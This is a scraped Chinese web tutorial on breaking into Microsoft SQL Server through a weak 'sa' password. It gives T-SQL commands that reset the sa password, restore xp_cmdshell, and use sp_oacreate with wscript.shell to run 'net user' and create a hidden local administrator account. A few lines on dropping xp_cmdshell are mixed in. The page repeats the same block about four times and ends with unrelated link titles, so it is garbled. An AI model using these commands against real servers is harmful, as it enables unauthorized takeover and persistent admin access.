利用SQL分离器实现sa弱口令强行入侵
来源:互联网 发布:淘宝时空电玩psv 编辑:程序博客网 时间:2024/04/28 10:00
一.更改sa口令方法:
用sql综合利用工具连接后,执行命令:exec sp_password NULL,'新密码','sa'
(提示:慎用!)
二.简单修补sa弱口令:
方法1:查询分离器连接后执行:
if exists (select * from
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
GO
然后按F5键命令执行完毕。
方法2:查询分离器连接后
第一步执行:use master,
第二步执行:sp_dropextendedproc 'xp_cmdshell',
然后按F5键命令执行完毕。
三.常见情况恢复执行xp_cmdshell:
1 未能找到存储过程'master..xpcmdshell'。
恢复方法:查询分离器连接后,
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int,
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll',
然后按F5键命令执行完毕。
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一DLL。原因126(找不到指定模块。)
恢复方法:查询分离器连接后,
第一步执行:sp_dropextendedproc "xp_cmdshell",
第二步执行:sp_addextendedproc 'xp_cmdshell','xpsql70.dll'
然后按F5键命令执行完毕。
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
恢复方法:查询分离器连接后,
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
然后按F5键命令执行完毕。
四.终极方法:
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
查询分离器连接后,
2000servser系统:
declare @shell int exec sp_oacreate 'wscript.shell',@shell output
exec sp_oamethod @shell,'run',null,'c:/winnt/system32/cmd.exe /c net user 新用户 密码 /add'
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod
@shell,'run',null,'c:/winnt/system32/cmd.exe /c net localgroup administrators 新用户 /add'
xp或2003server系统:
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod
@shell,'run',null,'c:/windows/system32/cmd.exe /c net user 新用户 密码 /add'
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod
@shell,'run',null,'c:/windows/system32/cmd.exe /c net localgroup administrators 新用户 /add'
用sql综合利用工具连接后,执行命令:exec sp_password NULL,'新密码','sa'
(提示:慎用!)
二.简单修补sa弱口令:
方法1:查询分离器连接后执行:
if exists (select * from
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
GO
然后按F5键命令执行完毕。
方法2:查询分离器连接后
第一步执行:use master,
第二步执行:sp_dropextendedproc 'xp_cmdshell',
然后按F5键命令执行完毕。
三.常见情况恢复执行xp_cmdshell:
1 未能找到存储过程'master..xpcmdshell'。
恢复方法:查询分离器连接后,
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int,
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll',
然后按F5键命令执行完毕。
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一DLL。原因126(找不到指定模块。)
恢复方法:查询分离器连接后,
第一步执行:sp_dropextendedproc "xp_cmdshell",
第二步执行:sp_addextendedproc 'xp_cmdshell','xpsql70.dll'
然后按F5键命令执行完毕。
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
恢复方法:查询分离器连接后,
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
然后按F5键命令执行完毕。
四.终极方法:
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
查询分离器连接后,
2000servser系统:
declare @shell int exec sp_oacreate 'wscript.shell',@shell output
exec sp_oamethod @shell,'run',null,'c:/winnt/system32/cmd.exe /c net user 新用户 密码 /add'
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod
@shell,'run',null,'c:/winnt/system32/cmd.exe /c net localgroup administrators 新用户 /add'
xp或2003server系统:
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod
@shell,'run',null,'c:/windows/system32/cmd.exe /c net user 新用户 密码 /add'
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod
@shell,'run',null,'c:/windows/system32/cmd.exe /c net localgroup administrators 新用户 /add'
下面这些命令要SQL分离器才能实现,下面是一些关于sa弱口令相关命令。
注:具体问题具体分析,以上方法仅供参考,不一定有效,相关原理知识请自行查找。
一.更改sa口令方法:
用sql综合利用工具连接后,执行命令:exec sp_password NULL,'新密码','sa'
(提示:慎用!)
二.简单修补sa弱口令:
方法1:查询分离器连接后执行:
if exists (select * from
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
GO
然后按F5键命令执行完毕。
方法2:查询分离器连接后
第一步执行:use master,
第二步执行:sp_dropextendedproc 'xp_cmdshell',
然后按F5键命令执行完毕。
三.常见情况恢复执行xp_cmdshell:
1 未能找到存储过程'master..xpcmdshell'。
恢复方法:查询分离器连接后,
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int,
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll',
然后按F5键命令执行完毕。
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一DLL。原因126(找不到指定模块。)
恢复方法:查询分离器连接后,
第一步执行:sp_dropextendedproc "xp_cmdshell",
第二步执行:sp_addextendedproc 'xp_cmdshell','xpsql70.dll'
然后按F5键命令执行完毕。
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
恢复方法:查询分离器连接后,
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
然后按F5键命令执行完毕。
四.终极方法:
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
查询分离器连接后,
2000servser系统:
declare @shell int exec sp_oacreate 'wscript.shell',@shell output
exec sp_oamethod @shell,'run',null,'c:/winnt/system32/cmd.exe /c net user 新用户 密码 /add'
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod
@shell,'run',null,'c:/winnt/system32/cmd.exe /c net localgroup administrators 新用户 /add'
xp或2003server系统:
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod
@shell,'run',null,'c:/windows/system32/cmd.exe /c net user 新用户 密码 /add'
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod
@shell,'run',null,'c:/windows/system32/cmd.exe /c net localgroup administrators 新用户 /add'
注:具体问题具体分析,以上方法仅供参考,不一定有效,相关原理知识请自行查找。
一.更改sa口令方法:
用sql综合利用工具连接后,执行命令:exec sp_password NULL,'新密码','sa'
(提示:慎用!)
二.简单修补sa弱口令:
方法1:查询分离器连接后执行:
if exists (select * from
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
GO
然后按F5键命令执行完毕。
方法2:查询分离器连接后
第一步执行:use master,
第二步执行:sp_dropextendedproc 'xp_cmdshell',
然后按F5键命令执行完毕。
三.常见情况恢复执行xp_cmdshell:
1 未能找到存储过程'master..xpcmdshell'。
恢复方法:查询分离器连接后,
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int,
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll',
然后按F5键命令执行完毕。
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一DLL。原因126(找不到指定模块。)
恢复方法:查询分离器连接后,
第一步执行:sp_dropextendedproc "xp_cmdshell",
第二步执行:sp_addextendedproc 'xp_cmdshell','xpsql70.dll'
然后按F5键命令执行完毕。
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
恢复方法:查询分离器连接后,
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
然后按F5键命令执行完毕。
四.终极方法:
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
查询分离器连接后,
2000servser系统:
declare @shell int exec sp_oacreate 'wscript.shell',@shell output
exec sp_oamethod @shell,'run',null,'c:/winnt/system32/cmd.exe /c net user 新用户 密码 /add'
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod
@shell,'run',null,'c:/winnt/system32/cmd.exe /c net localgroup administrators 新用户 /add'
xp或2003server系统:
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod
@shell,'run',null,'c:/windows/system32/cmd.exe /c net user 新用户 密码 /add'
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod
@shell,'run',null,'c:/windows/system32/cmd.exe /c net localgroup administrators 新用户 /add'
- 利用SQL分离器实现sa弱口令强行入侵
- sa弱口令强行入侵
- sa弱口令强行入侵
- 利用SA弱口令入侵windows服务器
- sql弱口令入侵
- sql弱口令入侵
- SA弱口令入侵中的相关命令
- [sql server] Microsoft SQL Server SA弱口令攻防实战
- Microsoft SQL Server SA弱口令攻防实战
- Microsoft SQL Server SA弱口令攻防实战
- [吐]IPC弱口令入侵图文详解
- MS SQL数据库SA权限入侵的感悟
- MS SQL数据库SA权限入侵的感悟
- MS SQL数据库SA权限入侵的感悟
- Microsoft SQL Server SA权限最新入侵方法
- 利用流光扫描的SQL弱密码 入侵远程机子
- 口令入侵新手指南
- 简单口令入侵
- Myeclipse 配置struts2实例
- Asp.net 时间操作基类(短日期,长日期,时间差)
- 删除MSSQL危险存储过程的代码
- MSSQL 和 Mysql 切割字符串 自定义函数与存储过程
- Asp.NET 生成随机码基类(随机字母,随机数字,随机字母+数字 )
- 利用SQL分离器实现sa弱口令强行入侵
- Asp.net 弹出对话框基类 (输出alet警告框)
- Asp.net 文件上传基类(取得文件后缀名,保存文件,加入文字水印)
- Asp.net 字符串操作基类(安全,替换,分解等)
- 在网页外弹出提示层 IE only
- asp.net 取得远程的IP地址和浏览器类型
- Asp.net XMLHTTP 基类 (GET,Post发送和接收数据)
- ASP.NET MD5加密
- Excel操作基类